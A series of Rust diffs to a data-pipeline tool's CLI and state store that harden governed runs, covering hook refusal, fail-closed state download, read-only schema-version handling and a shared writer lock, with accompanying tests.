+        // Finding 1: thread `run`'s single `rocky_cfg` snapshot into the in-run
+        // replication gate so it evaluates `[policy]` / models-dir from the config
+        // `run` executed against, not a reload a mid-run swap could redirect.
+        ctx.gate_replication_targets(&replication_targets, &state_store, &rocky_cfg)?;
     }
 
     // --- Sequential: catalog/schema setup + table collection ---

--- a/engine/crates/rocky-cli/src/commands/run.rs
+++ b/engine/crates/rocky-cli/src/commands/run.rs
@@ -11906,8 +11906,8 @@ merge_keys = ["id"]
         // exact way `execute_models` recomputes at the choke-point (compile +
         // surrogate/contract extras), so the two must agree.
         let no_mask = std::collections::BTreeMap::new();
-        let fp1 = exec_choke_fingerprint(&models, "cfg", "", &no_mask);
-        let fp2 = exec_choke_fingerprint(&models, "cfg", "", &no_mask);
+        let fp1 = exec_choke_fingerprint(&models, "cfg", "", "", &no_mask);
+        let fp2 = exec_choke_fingerprint(&models, "cfg", "", "", &no_mask);
         assert_eq!(
             fp1, fp2,
             "same bytes must fingerprint identically (stability)"
@@ -12041,6 +12041,7 @@ merge_keys = ["id"]
         models_dir: &std::path::Path,
         config_identity: &str,
         governance_identity: &str,
+        exec_control_identity: &str,
         resolved_mask: &std::collections::BTreeMap<String, rocky_ir::MaskStrategy>,
     ) -> String {
         use rocky_compiler::compile::{self, CompilerConfig};
@@ -12059,10 +12060,7 @@ merge_keys = ["id"]
             &result.project.models,
             config_identity,
             governance_identity,
-            // The exec-choke fingerprint helper models a project with no
-            // execution-control config bound (#1095) — the gates it feeds use an
-            // empty `exec_control_identity` too, so the two stay symmetric.
-            "",
+            exec_control_identity,
             &extras,
         )
         .unwrap()
@@ -12140,7 +12138,7 @@ merge_keys = ["id"]
 
         let db = dir.path().join("wh.duckdb");
         // Plan-time fingerprint binds the surrogate spec (columns = [id]).
-        let fp = exec_choke_fingerprint(&models, "cfg", "", &std::collections::BTreeMap::new());
+        let fp = exec_choke_fingerprint(&models, "cfg", "", "", &std::collections::BTreeMap::new());
         // (2) unchanged apply → no refuse.
         governed_apply(
             &models,
@@ -12190,7 +12188,7 @@ merge_keys = ["id"]
         .unwrap();
 
         let db = dir.path().join("wh.duckdb");
-        let fp = exec_choke_fingerprint(&models, "cfg", "", &std::collections::BTreeMap::new());
+        let fp = exec_choke_fingerprint(&models, "cfg", "", "", &std::collections::BTreeMap::new());
         governed_apply(
             &models,
             &db,
@@ -12266,7 +12264,7 @@ merge_keys = ["id"]
 
         let hash_mask = std::collections::BTreeMap::from([("pii".to_string(), MaskStrategy::Hash)]);
         // Baseline fp binds the EFFECTIVE mask {pii→hash}.
-        let fp = exec_choke_fingerprint(&models, "cfg", "", &hash_mask);
+        let fp = exec_choke_fingerprint(&models, "cfg", "", "", &hash_mask);
         governed_apply(&models, &db, "mask-ok", &fp, &hash_mask, true)
             .await
             .expect("unchanged effective mask must NOT refuse");
@@ -12396,7 +12394,7 @@ merge_keys = ["id"]
         // A scoped apply omits the mask, so the reviewed fingerprint is computed
         // with an EMPTY mask (over all compiled models).
         let empty_mask = std::collections::BTreeMap::new();
-        let fp = exec_choke_fingerprint(&models, "cfg", "", &empty_mask);
+        let fp = exec_choke_fingerprint(&models, "cfg", "", "", &empty_mask);
 
         // The gate still carries `b`'s (and `a`'s) resolved mask — but the scoped
         // choke-point must ignore it. A confidential→redact change on `b` must not
@@ -12557,7 +12555,13 @@ merge_keys = ["id"]
         let gov = crate::commands::apply::governance_policy_identity(&cfg);
         let resolved_mask: std::collections::BTreeMap<String, rocky_ir::MaskStrategy> =
             std::collections::BTreeMap::new();
-        let apply_fp = exec_choke_fingerprint(&models, &identity, &gov, &resolved_mask);
+        // Match the plan side (`compute_embedded_capabilities` → plan.rs), which
+        // binds the execution-control identity over the config's own directory.
+        let ec = crate::commands::apply::execution_control_identity(
+            &cfg,
+            config_path.parent().unwrap(),
+        );
+        let apply_fp = exec_choke_fingerprint(&models, &identity, &gov, &ec, &resolved_mask);
 
         assert_eq!(
             caps.models_fingerprint.as_deref(),
@@ -12615,7 +12619,13 @@ merge_keys = ["id"]
         let identity = crate::commands::apply::config_policy_identity(&cfg);
         let gov = crate::commands::apply::governance_policy_identity(&cfg);
         let resolved_mask = cfg.resolve_mask_for_env(None);
-        let apply_fp = exec_choke_fingerprint(&models, &identity, &gov, &resolved_mask);
+        // Match the plan side (`compute_embedded_capabilities` → plan.rs), which
+        // binds the execution-control identity over the config's own directory.
+        let ec = crate::commands::apply::execution_control_identity(
+            &cfg,
+            config_path.parent().unwrap(),
+        );
+        let apply_fp = exec_choke_fingerprint(&models, &identity, &gov, &ec, &resolved_mask);
         assert_eq!(
             caps.models_fingerprint.as_deref(),
             Some(apply_fp.as_str()),

--- a/engine/crates/rocky-cli/src/commands/run.rs
+++ b/engine/crates/rocky-cli/src/commands/run.rs
@@ -1068,17 +1068,32 @@ pub(crate) fn refuse_governed_side_effects(
     governed: bool,
     hooks: &rocky_core::hooks::HooksConfig,
 ) -> Result<()> {
-    use rocky_core::hooks::{HookConfigOrList, WebhookConfigOrList};
-    // Count NORMALIZED executable side effects, not map cardinality: an empty
-    // `[[hook.on_x]]` list registers zero hooks and fires nothing, so it must NOT
-    // refuse (red-team #9). Single ⇒ one; Multiple ⇒ the vector's length.
-    let has_shell_hook = hooks.hooks.values().any(|h| match h {
-        HookConfigOrList::Single(_) => true,
-        HookConfigOrList::Multiple(v) => !v.is_empty(),
+    use rocky_core::hooks::{HookConfigOrList, HookEvent, WebhookConfigOrList};
+    // Count NORMALIZED executable side effects EXACTLY as `HookRegistry::from_config`
+    // does (hooks/mod.rs): an entry fires only when its key resolves to a known
+    // `HookEvent` AND its list is non-empty. An unknown event key (a typo like
+    // `[hook.on_typ]`, which the registry skips) or an empty `[[hook.on_x]]` list
+    // registers and fires nothing → must NOT refuse (red-team #9).
+    let executable = |key: &str, non_empty: bool| {
+        HookEvent::from_config_key(key).is_some() && non_empty
+    };
+    let has_shell_hook = hooks.hooks.iter().any(|(event, h)| {
+        executable(
+            event,
+            match h {
+                HookConfigOrList::Single(_) => true,
+                HookConfigOrList::Multiple(v) => !v.is_empty(),
+            },
+        )
     });
-    let has_webhook = hooks.webhooks.values().any(|w| match w {
-        WebhookConfigOrList::Single(_) => true,
-        WebhookConfigOrList::Multiple(v) => !v.is_empty(),
+    let has_webhook = hooks.webhooks.iter().any(|(event, w)| {
+        executable(
+            event,
+            match w {
+                WebhookConfigOrList::Single(_) => true,
+                WebhookConfigOrList::Multiple(v) => !v.is_empty(),
+            },
+        )
     });
     if governed && (has_shell_hook || has_webhook) {
         anyhow::bail!(
@@ -12163,6 +12178,23 @@ merge_keys = ["id"]
             .collect(),
         };
         assert!(super::refuse_governed_side_effects(true, &empty_list).is_ok());
+        // #9 (round 3): an UNKNOWN event key (a typo) is skipped by the registry
+        // and fires nothing → must NOT be refused, even with a command present.
+        let unknown_event = HooksConfig {
+            webhooks: Default::default(),
+            hooks: [(
+                "on_typo_not_an_event".to_string(),
+                HookConfigOrList::Single(HookConfig {
+                    command: "scripts/x.sh".to_string(),
+                    timeout_ms: 1000,
+                    on_failure: Default::default(),
+                    env: Default::default(),
+                }),
+            )]
+            .into_iter()
+            .collect(),
+        };
+        assert!(super::refuse_governed_side_effects(true, &unknown_event).is_ok());
     }
 
     /// Run one governed `execute_models` apply under a fixed gate and return the

--- a/engine/crates/rocky-cli/src/commands/run.rs
+++ b/engine/crates/rocky-cli/src/commands/run.rs
@@ -11921,6 +11921,7 @@ merge_keys = ["id"]
             expected: Some(fp1.clone()),
             config_identity: "cfg".to_string(),
             governance_identity: String::new(),
+            exec_control_identity: String::new(),
             resolved_mask: std::collections::BTreeMap::new(),
             reviewed_source_schemas: Some(std::collections::BTreeMap::new()),
             plan_id: "p".to_string(),
@@ -12058,6 +12059,10 @@ merge_keys = ["id"]
             &result.project.models,
             config_identity,
             governance_identity,
+            // The exec-choke fingerprint helper models a project with no
+            // execution-control config bound (#1095) — the gates it feeds use an
+            // empty `exec_control_identity` too, so the two stay symmetric.
+            "",
             &extras,
         )
         .unwrap()
@@ -12079,6 +12084,7 @@ merge_keys = ["id"]
             expected: Some(expected_fp.to_string()),
             config_identity: "cfg".to_string(),
             governance_identity: String::new(),
+            exec_control_identity: String::new(),
             resolved_mask: resolved_mask.clone(),
             reviewed_source_schemas: Some(std::collections::BTreeMap::new()),
             plan_id: "p".to_string(),
@@ -12317,6 +12323,7 @@ merge_keys = ["id"]
             expected: None,
             config_identity: "cfg".to_string(),
             governance_identity: String::new(),
+            exec_control_identity: String::new(),
             resolved_mask: std::collections::BTreeMap::new(),
             reviewed_source_schemas: Some(snapshot),
             plan_id: "p".to_string(),
@@ -12402,6 +12409,7 @@ merge_keys = ["id"]
             expected: Some(fp),
             config_identity: "cfg".to_string(),
             governance_identity: String::new(),
+            exec_control_identity: String::new(),
             resolved_mask: with_b_mask,
             reviewed_source_schemas: Some(std::collections::BTreeMap::new()),
             plan_id: "p".to_string(),
@@ -12456,6 +12464,7 @@ merge_keys = ["id"]
             expected: None,
             config_identity: "cfg".to_string(),
             governance_identity: String::new(),
+            exec_control_identity: String::new(),
             resolved_mask: std::collections::BTreeMap::new(),
             reviewed_source_schemas: None, // v2 governed plan MUST carry Some
             plan_id: "p".to_string(),

--- a/engine/crates/rocky-cli/src/commands/run.rs
+++ b/engine/crates/rocky-cli/src/commands/run.rs
@@ -1074,9 +1074,8 @@ pub(crate) fn refuse_governed_side_effects(
     // `HookEvent` AND its list is non-empty. An unknown event key (a typo like
     // `[hook.on_typ]`, which the registry skips) or an empty `[[hook.on_x]]` list
     // registers and fires nothing → must NOT refuse (red-team #9).
-    let executable = |key: &str, non_empty: bool| {
-        HookEvent::from_config_key(key).is_some() && non_empty
-    };
+    let executable =
+        |key: &str, non_empty: bool| HookEvent::from_config_key(key).is_some() && non_empty;
     let has_shell_hook = hooks.hooks.iter().any(|(event, h)| {
         executable(
             event,

--- a/engine/crates/rocky-cli/src/commands/run.rs
+++ b/engine/crates/rocky-cli/src/commands/run.rs
@@ -1068,7 +1068,19 @@ pub(crate) fn refuse_governed_side_effects(
     governed: bool,
     hooks: &rocky_core::hooks::HooksConfig,
 ) -> Result<()> {
-    if governed && !(hooks.hooks.is_empty() && hooks.webhooks.is_empty()) {
+    use rocky_core::hooks::{HookConfigOrList, WebhookConfigOrList};
+    // Count NORMALIZED executable side effects, not map cardinality: an empty
+    // `[[hook.on_x]]` list registers zero hooks and fires nothing, so it must NOT
+    // refuse (red-team #9). Single ⇒ one; Multiple ⇒ the vector's length.
+    let has_shell_hook = hooks.hooks.values().any(|h| match h {
+        HookConfigOrList::Single(_) => true,
+        HookConfigOrList::Multiple(v) => !v.is_empty(),
+    });
+    let has_webhook = hooks.webhooks.values().any(|w| match w {
+        WebhookConfigOrList::Single(_) => true,
+        WebhookConfigOrList::Multiple(v) => !v.is_empty(),
+    });
+    if governed && (has_shell_hook || has_webhook) {
         anyhow::bail!(
             "refusing a governed apply that configures `[hook]`/`[hook.webhooks]`: hook \
              commands fire at pipeline-start, before the execution-fingerprint gate (and a \
@@ -1626,6 +1638,20 @@ pub async fn run(
     {
         Ok(()) => true,
         Err(e) => {
+            // #2 (red-team): a GOVERNED run whose remote-state download failed
+            // cannot see a cross-pod freeze/budget recorded by another pod. If a
+            // `[policy]` plane is configured (the in-run gate WILL consult
+            // POLICY_DECISIONS), fail-closed rather than evaluate the freeze from
+            // stale local state and fail OPEN. With no `[policy]` there is nothing
+            // to enforce, so continue — same as an ungoverned run, no availability
+            // regression (red-team #8's no-policy false-abort avoided).
+            if exec_fp_gate.is_some() && rocky_cfg.policy.is_some() {
+                anyhow::bail!(
+                    "refusing a governed run: remote state download failed ({e}), so a \
+                     cross-pod freeze/budget in the durable state ledger cannot be seen \
+                     (fail-closed). Retry once the `[state]` backend is reachable."
+                );
+            }
             warn!(error = %e, "state download failed, continuing with local state");
             false
         }
@@ -12125,6 +12151,18 @@ merge_keys = ["id"]
         assert!(super::refuse_governed_side_effects(false, &with_hook).is_ok());
         // Governed + no hooks → allowed.
         assert!(super::refuse_governed_side_effects(true, &empty).is_ok());
+        // #9: a governed run with an EMPTY `[[hook]]` list registers zero hooks
+        // and fires nothing → must NOT be refused (normalized count, not map key).
+        let empty_list = HooksConfig {
+            webhooks: Default::default(),
+            hooks: [(
+                "on_pipeline_start".to_string(),
+                HookConfigOrList::Multiple(vec![]),
+            )]
+            .into_iter()
+            .collect(),
+        };
+        assert!(super::refuse_governed_side_effects(true, &empty_list).is_ok());
     }
 
     /// Run one governed `execute_models` apply under a fixed gate and return the

--- a/engine/crates/rocky-core/src/state.rs
+++ b/engine/crates/rocky-core/src/state.rs
@@ -174,6 +174,14 @@ const POLICY_DECISIONS: TableDefinition<&str, &[u8]> = TableDefinition::new("pol
 /// serialized [`PersistedJob`]. Persisting job status here (rather than
 /// in-memory only) is what lets a killed-and-restarted sidecar report honest
 /// status for jobs it launched instead of a blank slate.
+///
+/// **Local-only** (listed in [`LOCAL_ONLY_TABLE_NAMES`], unlike the governance
+/// ledgers above): job records are ephemeral *per-node* server state, scoped to
+/// the lifetime of one `rocky serve` process and its restart sweep. `serve` is
+/// long-running, so per-job remote round-trips would be impractical, and a job
+/// launched on one pod is meaningless to another. Replicating it would let one
+/// server's stale `jobs` rows overwrite another's — so it is deliberately
+/// excluded from the remote state snapshot.
 const JOBS: TableDefinition<&str, &[u8]> = TableDefinition::new("jobs");
 /// Eviction custody ledger for `rocky gc` — one row per artifact retired
 /// from the [`OUTPUT_ARTIFACTS`] ledger.
@@ -203,7 +211,12 @@ const METADATA: TableDefinition<&str, &str> = TableDefinition::new("metadata");
 /// Kept alongside the table definitions so the replicate-posture decision
 /// travels with the table name — adding a new local-only table is a
 /// one-place edit instead of "grep the whole crate for replicate lists".
-pub const LOCAL_ONLY_TABLE_NAMES: &[&str] = &["schema_cache"];
+///
+/// - `schema_cache` — machine-local cached warehouse types (a fresh clone must
+///   not inherit another machine's stale types).
+/// - `jobs` — ephemeral per-node `rocky serve` job records (see [`JOBS`]). Not
+///   a governance ledger; replicating it across pods would clobber peers.
+pub const LOCAL_ONLY_TABLE_NAMES: &[&str] = &["schema_cache", "jobs"];
 
 /// Schema version for the current set of state tables.
 ///
@@ -435,6 +448,27 @@ enum InitOutcome {
     RecreateForwardIncompat { found: u32 },
 }
 
+/// How a store is being opened. Controls two coupled decisions in
+/// [`StateStore::open_inner`] / [`StateStore::init_db`]: whether to take the
+/// advisory write lock, and whether `init_db` may **stamp/upgrade** the
+/// `schema_version` metadata.
+///
+/// A [`ReadOnly`][OpenMode::ReadOnly] open (inspection commands, the LSP, server
+/// read APIs) must be side-effect-free with respect to the version stamp: it
+/// still materializes the tables the read methods require, but it must NOT bump
+/// a store written by an older binary forward to [`CURRENT_SCHEMA_VERSION`].
+/// Stamping on a read would let a `rocky state show` silently rewrite the very
+/// version it is reporting, and would defeat forward/backward-compat probes that
+/// depend on the on-disk version staying put until a real write occurs.
+#[derive(Clone, Copy, PartialEq, Eq)]
+enum OpenMode {
+    /// Read-write open: take the advisory lock and stamp/upgrade the version.
+    ReadWrite,
+    /// Read-only open: no advisory lock, and never stamp/upgrade the version
+    /// (tables are still created so read methods work).
+    ReadOnly,
+}
+
 impl StateStore {
     /// Opens or creates a state store at the given path for **writing**.
     ///
@@ -453,7 +487,7 @@ impl StateStore {
     /// binary (stored > current) an error is returned immediately so that the
     /// caller can surface a clear message rather than silently misreading data.
     pub fn open(path: &Path) -> Result<Self, StateError> {
-        Self::open_inner(path, true, SchemaMismatchPolicy::Fail)
+        Self::open_inner(path, OpenMode::ReadWrite, SchemaMismatchPolicy::Fail)
     }
 
     /// Opens or creates a state store for **writing** with an explicit
@@ -472,7 +506,7 @@ impl StateStore {
     /// `[state] on_schema_mismatch`); every other caller uses the hard-fail
     /// default via [`open`][Self::open].
     pub fn open_with_policy(path: &Path, policy: SchemaMismatchPolicy) -> Result<Self, StateError> {
-        Self::open_inner(path, true, policy)
+        Self::open_inner(path, OpenMode::ReadWrite, policy)
     }
 
     /// Opens an existing state store for **read-only** access.
@@ -492,7 +526,7 @@ impl StateStore {
     /// millisecond-scale collisions the LSP creates on every debounced
     /// keystroke.
     pub fn open_read_only(path: &Path) -> Result<Self, StateError> {
-        Self::open_inner(path, false, SchemaMismatchPolicy::Fail)
+        Self::open_inner(path, OpenMode::ReadOnly, SchemaMismatchPolicy::Fail)
     }
 
     /// Reads the schema version stamped in an on-disk state file **without**
@@ -551,13 +585,13 @@ impl StateStore {
 
     fn open_inner(
         path: &Path,
-        lock: bool,
+        mode: OpenMode,
         policy: SchemaMismatchPolicy,
     ) -> Result<Self, StateError> {
         // Acquire the advisory lock BEFORE opening the database — otherwise two
         // concurrent writers could both pass `Database::create` before either
-        // of them reaches the lock check.
-        let lock_file = if lock {
+        // of them reaches the lock check. Read-only opens skip the lock.
+        let lock_file = if matches!(mode, OpenMode::ReadWrite) {
             let lock_path = path.with_extension("redb.lock");
             let file = std::fs::OpenOptions::new()
                 .create(true)
@@ -585,7 +619,7 @@ impl StateStore {
 
         let db = open_redb_with_retry(path)?;
 
-        match Self::init_db(&db, path, policy)? {
+        match Self::init_db(&db, path, mode, policy)? {
             InitOutcome::Ready => Ok(StateStore {
                 db,
                 _lock_file: lock_file,
@@ -627,7 +661,7 @@ impl StateStore {
                     });
                 }
                 let db = open_redb_with_retry(path)?;
-                match Self::init_db(&db, path, policy)? {
+                match Self::init_db(&db, path, mode, policy)? {
                     InitOutcome::Ready => Ok(StateStore {
                         db,
                         _lock_file: lock_file,
@@ -654,11 +688,20 @@ impl StateStore {
     /// when the on-disk version is newer than this binary supports **and** the
     /// policy is [`SchemaMismatchPolicy::Recreate`]; under
     /// [`SchemaMismatchPolicy::Fail`] the same condition returns
-    /// [`StateError::SchemaMismatch`]. Otherwise stamps/upgrades the version,
-    /// creates the tables, commits, and returns [`InitOutcome::Ready`].
+    /// [`StateError::SchemaMismatch`]. Otherwise creates the tables, commits,
+    /// and returns [`InitOutcome::Ready`].
+    ///
+    /// The `schema_version` stamp/upgrade is written **only** under
+    /// [`OpenMode::ReadWrite`]. A [`OpenMode::ReadOnly`] open still creates the
+    /// tables (read methods require them) but leaves the on-disk version
+    /// untouched — it never bumps an older store forward and never downgrades.
+    /// The forward-incompatible check (`found > CURRENT`) runs in **both** modes,
+    /// so a read-only open of a newer store still fails with
+    /// [`StateError::SchemaMismatch`] rather than silently misreading it.
     fn init_db(
         db: &Database,
         path: &Path,
+        mode: OpenMode,
         policy: SchemaMismatchPolicy,
     ) -> Result<InitOutcome, StateError> {
         let txn = db.begin_write()?;
@@ -692,14 +735,21 @@ impl StateStore {
                         };
                     }
                     // Upgrade stamp so future migrations can branch on
-                    // the actual version stored on disk.
-                    if found < CURRENT_SCHEMA_VERSION {
+                    // the actual version stored on disk. Read-only opens must
+                    // NOT bump the on-disk version — inspection is side-effect
+                    // free with respect to the stamp.
+                    if found < CURRENT_SCHEMA_VERSION && matches!(mode, OpenMode::ReadWrite) {
                         metadata.insert("schema_version", &*CURRENT_SCHEMA_VERSION.to_string())?;
                     }
                 }
                 None => {
-                    // Fresh database or pre-versioning database — stamp the version.
-                    metadata.insert("schema_version", &*CURRENT_SCHEMA_VERSION.to_string())?;
+                    // Fresh database or pre-versioning database — stamp the
+                    // version, but only on a read-write open. A read-only open
+                    // leaves an unversioned store unstamped (tables are still
+                    // created below so read methods work).
+                    if matches!(mode, OpenMode::ReadWrite) {
+                        metadata.insert("schema_version", &*CURRENT_SCHEMA_VERSION.to_string())?;
+                    }
                 }
             }
 
@@ -8023,6 +8073,79 @@ mod tests {
             "got {err:?}"
         );
         // The file still carries the newer stamp — Fail does not mutate it.
+        assert_eq!(
+            StateStore::peek_schema_version(&path).unwrap(),
+            Some(CURRENT_SCHEMA_VERSION + 1)
+        );
+    }
+
+    /// R1: a **read-only** open must NOT bump the on-disk `schema_version` stamp.
+    /// Inspection commands (`rocky state`, LSP, server read APIs) route through
+    /// `open_read_only`; before the fix its `init_db` call stamped the store
+    /// forward to `CURRENT_SCHEMA_VERSION` in a write txn, silently rewriting the
+    /// very version a `rocky state show` reports. Post-fix the stamp is skipped
+    /// while the tables are still created so read methods work.
+    #[test]
+    fn open_read_only_does_not_bump_schema_version_stamp() {
+        let dir = TempDir::new().unwrap();
+        let path = dir.path().join("state.redb");
+        // Create a real store (stamps CURRENT), then force it back to an OLDER
+        // version to simulate a store written by a previous binary.
+        drop(StateStore::open(&path).unwrap());
+        let older = (CURRENT_SCHEMA_VERSION - 1).to_string();
+        force_schema_version(&path, &older);
+        assert_eq!(
+            StateStore::peek_schema_version(&path).unwrap(),
+            Some(CURRENT_SCHEMA_VERSION - 1),
+            "precondition: the store is stamped at the older version"
+        );
+
+        // Read-only open must leave the stamp untouched...
+        {
+            let store = StateStore::open_read_only(&path).unwrap();
+            // ...and read methods still work (tables exist).
+            assert!(
+                store.get_watermark("cat.sch.tbl").unwrap().is_none(),
+                "a read method must succeed against the read-only store (tables were created)"
+            );
+        }
+        assert_eq!(
+            StateStore::peek_schema_version(&path).unwrap(),
+            Some(CURRENT_SCHEMA_VERSION - 1),
+            "read-only open must NOT bump the on-disk schema_version stamp"
+        );
+
+        // Contrast: a read-WRITE open still upgrades the stamp (no regression to
+        // the fresh-store / upgrade bootstrap).
+        drop(StateStore::open(&path).unwrap());
+        assert_eq!(
+            StateStore::peek_schema_version(&path).unwrap(),
+            Some(CURRENT_SCHEMA_VERSION),
+            "a read-write open must still upgrade an older stamp forward"
+        );
+    }
+
+    /// R1: a forward-incompatible store (found > CURRENT) opened read-only must
+    /// still fail with `SchemaMismatch` — skipping the stamp must not weaken the
+    /// forward-compat guard into silently misreading newer state.
+    #[test]
+    fn open_read_only_still_rejects_forward_incompat() {
+        let dir = TempDir::new().unwrap();
+        let path = dir.path().join("state.redb");
+        drop(StateStore::open(&path).unwrap());
+        let future = (CURRENT_SCHEMA_VERSION + 1).to_string();
+        force_schema_version(&path, &future);
+
+        let err = match StateStore::open_read_only(&path) {
+            Ok(_) => panic!("expected SchemaMismatch on a forward-incompatible read-only open"),
+            Err(e) => e,
+        };
+        assert!(
+            matches!(err, StateError::SchemaMismatch { found, expected, .. }
+                if found == CURRENT_SCHEMA_VERSION + 1 && expected == CURRENT_SCHEMA_VERSION),
+            "got {err:?}"
+        );
+        // Still not mutated.
         assert_eq!(
             StateStore::peek_schema_version(&path).unwrap(),
             Some(CURRENT_SCHEMA_VERSION + 1)

--- a/engine/crates/rocky-core/src/state.rs
+++ b/engine/crates/rocky-core/src/state.rs
@@ -413,12 +413,57 @@ impl From<redb::TransactionError> for StateError {
     }
 }
 
+/// A held exclusive advisory writer lock on `<path>.redb.lock` — the SAME lock
+/// [`StateStore::open`] takes for the lifetime of a writer. Dropping it releases
+/// the lock.
+///
+/// Exposed so `state_sync::download_state` can serialize its atomic publish
+/// (rename of the state file into place) with StateStore writers and with a
+/// concurrent download's publish on the same namespace. The lock is a *separate*
+/// lockfile, never the state file itself, so renaming the state file while
+/// holding it is sound.
+pub struct StateWriterLock {
+    _file: File,
+}
+
+/// Try to acquire the exclusive advisory writer lock for the state file at
+/// `path`, WITHOUT blocking.
+///
+/// Returns [`StateError::LockHeldByOther`] if another writer (a live
+/// [`StateStore`] or a concurrent publish) already holds it. The flock is
+/// OS-level and cross-process, so a second process is genuinely serialized. The
+/// lock lives on `<path>.redb.lock` (never the state file), so the caller may
+/// atomically `rename` a new state file into `path` while holding this guard.
+pub fn try_acquire_writer_lock(path: &Path) -> Result<StateWriterLock, StateError> {
+    let lock_path = path.with_extension("redb.lock");
+    let file = std::fs::OpenOptions::new()
+        .create(true)
+        .truncate(false)
+        .read(true)
+        .write(true)
+        .open(&lock_path)
+        .map_err(|e| StateError::LockIo {
+            path: lock_path.display().to_string(),
+            source: e,
+        })?;
+    FileExt::try_lock(&file).map_err(|e| match e {
+        fs4::TryLockError::WouldBlock => StateError::LockHeldByOther {
+            path: path.display().to_string(),
+        },
+        fs4::TryLockError::Error(source) => StateError::LockIo {
+            path: lock_path.display().to_string(),
+            source,
+        },
+    })?;
+    Ok(StateWriterLock { _file: file })
+}
+
 /// Embedded state store backed by redb for tracking watermarks and run history.
 pub struct StateStore {
     db: Database,
-    // Held exclusive advisory lock on `<path>.lock`. `None` for read-only opens.
-    // Released automatically when the `File` is dropped.
-    _lock_file: Option<File>,
+    // Held exclusive advisory lock on `<path>.redb.lock`. `None` for read-only
+    // opens. Released automatically when the guard (and its `File`) is dropped.
+    _lock: Option<StateWriterLock>,
     // `true` when this store was opened against a forward-incompatible on-disk
     // schema under [`SchemaMismatchPolicy::Recreate`] and the local file was
     // bootstrapped fresh. The run path reads this via
@@ -590,29 +635,10 @@ impl StateStore {
     ) -> Result<Self, StateError> {
         // Acquire the advisory lock BEFORE opening the database — otherwise two
         // concurrent writers could both pass `Database::create` before either
-        // of them reaches the lock check. Read-only opens skip the lock.
-        let lock_file = if matches!(mode, OpenMode::ReadWrite) {
-            let lock_path = path.with_extension("redb.lock");
-            let file = std::fs::OpenOptions::new()
-                .create(true)
-                .truncate(false)
-                .read(true)
-                .write(true)
-                .open(&lock_path)
-                .map_err(|e| StateError::LockIo {
-                    path: lock_path.display().to_string(),
-                    source: e,
-                })?;
-            FileExt::try_lock(&file).map_err(|e| match e {
-                fs4::TryLockError::WouldBlock => StateError::LockHeldByOther {
-                    path: path.display().to_string(),
-                },
-                fs4::TryLockError::Error(source) => StateError::LockIo {
-                    path: lock_path.display().to_string(),
-                    source,
-                },
-            })?;
-            Some(file)
+        // of them reaches the lock check. Read-only opens skip the lock. Shared
+        // with `state_sync`'s publish path via [`try_acquire_writer_lock`].
+        let lock = if matches!(mode, OpenMode::ReadWrite) {
+            Some(try_acquire_writer_lock(path)?)
         } else {
             None
         };
@@ -622,7 +648,7 @@ impl StateStore {
         match Self::init_db(&db, path, mode, policy)? {
             InitOutcome::Ready => Ok(StateStore {
                 db,
-                _lock_file: lock_file,
+                _lock: lock,
                 recreated_for_forward_incompat: false,
             }),
             InitOutcome::RecreateForwardIncompat { found } => {
@@ -664,7 +690,7 @@ impl StateStore {
                 match Self::init_db(&db, path, mode, policy)? {
                     InitOutcome::Ready => Ok(StateStore {
                         db,
-                        _lock_file: lock_file,
+                        _lock: lock,
                         recreated_for_forward_incompat: true,
                     }),
                     // A file we just created cannot carry a newer schema version.
@@ -6929,6 +6955,46 @@ mod tests {
     /// and raced the opener's 5×50ms≈250ms budget; under uneven CI load the
     /// holder thread could be starved past the opener's last attempt, so the
     /// opener gave up with `Busy` and the test flaked.
+    /// Finding B: the advisory writer lock `state_sync::download_state` takes for
+    /// its publish is the SAME cross-acquire lock `StateStore::open` holds. A
+    /// second acquire fails while a live writer holds it (so a concurrent
+    /// download can't `rename` over a live writer's file), and the guard releases
+    /// the lock on drop.
+    #[test]
+    fn try_acquire_writer_lock_is_exclusive_and_releases() {
+        let dir = TempDir::new().unwrap();
+        let path = dir.path().join("state.redb");
+
+        // A live writer store holds the lock — a second acquire must fail.
+        let store = StateStore::open(&path).unwrap();
+        assert!(
+            matches!(
+                super::try_acquire_writer_lock(&path),
+                Err(StateError::LockHeldByOther { .. })
+            ),
+            "a second writer-lock acquire must fail while a live StateStore holds it"
+        );
+
+        // Released when the store drops → acquire succeeds.
+        drop(store);
+        let guard = super::try_acquire_writer_lock(&path)
+            .expect("the writer lock must be free once the store is dropped");
+
+        // The guard itself is exclusive while held, and frees the lock on drop.
+        assert!(
+            matches!(
+                super::try_acquire_writer_lock(&path),
+                Err(StateError::LockHeldByOther { .. })
+            ),
+            "the guard must hold the lock exclusively"
+        );
+        drop(guard);
+        assert!(
+            super::try_acquire_writer_lock(&path).is_ok(),
+            "the guard must release the lock on drop"
+        );
+    }
+
     #[test]
     fn open_read_only_retries_and_succeeds_after_brief_hold() {
         use std::sync::atomic::{AtomicUsize, Ordering};

--- a/engine/crates/rocky-core/src/state_sync.rs
+++ b/engine/crates/rocky-core/src/state_sync.rs
@@ -271,96 +271,93 @@ enum DownloadOutcome {
 ///
 /// The **Local** backend performs no transfer, so there is nothing to replace
 /// and nothing to preserve — it delegates straight to [`download_state_inner`].
+///
+/// ## Crash safety + fail-closed (finding 5)
+///
+/// The remote content is downloaded into a STAGING file beside `local_path` and
+/// the local-only tables are merged into that staging file; only then is the
+/// COMPLETE merged db published to `local_path` with a single atomic `rename`.
+/// So `local_path` is never left holding remote content *without* its local-only
+/// tables — a crash before the rename leaves the prior local file fully intact.
+/// A snapshot / merge / publish failure is **fail-closed** (propagated as `Err`
+/// after a bounded retry on transient redb open contention), distinct from a
+/// genuinely-absent local file (which is not an error — there is simply nothing
+/// to preserve).
 pub async fn download_state(config: &StateConfig, local_path: &Path) -> Result<(), StateSyncError> {
+    let remote_key = remote_state_key(local_path);
+
     // Local backend never replaces the file — skip the whole preserve dance.
     if matches!(config.backend, StateBackend::Local) {
-        download_state_inner(config, local_path).await?;
+        download_state_inner(config, local_path, &remote_key).await?;
         return Ok(());
     }
 
-    // Snapshot the local-only tables BEFORE the download overwrites the file.
-    // Best-effort: an unreadable local db (corrupt / absent) means there is
-    // nothing durable to preserve, so we proceed without the snapshot rather
-    // than blocking the run — the download's own fail-closed semantics for a
-    // *remote* error are untouched.
-    let preserved = if local_path.exists() {
-        match snapshot_local_only_tables(local_path) {
-            Ok(snapshot) => Some(snapshot),
-            Err(e) => {
-                warn!(
-                    error = %e,
-                    outcome = "preserve_snapshot_failed",
-                    "could not snapshot local-only state tables before download; \
-                     proceeding without preservation (jobs / schema_cache may reset)"
-                );
-                None
-            }
-        }
+    let scratch_dir = sibling_scratch_dir(local_path);
+
+    // Snapshot the local-only tables (jobs, schema_cache) BEFORE any download —
